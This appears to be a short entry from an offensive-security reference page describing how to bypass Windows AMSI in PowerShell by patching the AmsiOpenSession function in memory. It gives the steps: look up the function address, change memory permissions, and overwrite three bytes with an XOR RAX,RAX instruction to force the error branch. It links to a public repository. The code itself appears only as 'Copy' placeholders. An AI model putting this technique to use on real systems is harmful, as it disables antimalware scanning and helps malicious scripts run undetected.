.. / AMSI-Bypass-AmsiOpenSession_Assembly
Star

With this code in Powershell it is possible to bypass the AMSI. We’ll modify the assembly instructions themselves instead of the data they are acting upon in a technique known as binary patching. We can use this technique to hotpatch the code and force it to fail even if the data structure is valid. This is done by overwriting the 3 Bytes TEST RDX,RDX with an XOR RAX,RAX instruction, forcing the execution flow to the error branch, which will disable AMSI.

Command Reference:

Obtain the memory address of AmsiOpenSession (Lookup Function)

Modify the memory permissions where AmsiOpenSession is located (Lookup with DelegateType)

Modify the three bytes at that location. (TEST RDX,RDX with an XOR RAX,RAX, Copy function)
Command: Copy Extra code: Copy References:

https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell#Patching-AMSI-AmsiOpenSession